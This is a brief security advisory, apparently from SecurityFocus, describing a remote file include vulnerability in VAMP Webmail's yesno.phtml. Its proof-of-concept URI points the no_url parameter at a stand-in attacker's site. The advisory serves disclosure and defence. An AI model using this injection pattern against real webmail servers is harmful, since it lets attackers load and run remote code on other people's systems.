VAMP Webmail Yesno.PHTML Remote File Include Vulnerability

Attackers can exploit this issue using a web client.

The following proof-of-concept URI is available:

http://www.example.com/wamp_dir/setup/yesno.phtml?no_url=attacker's site


 

Privacy Statement
Copyright 2010, SecurityFocus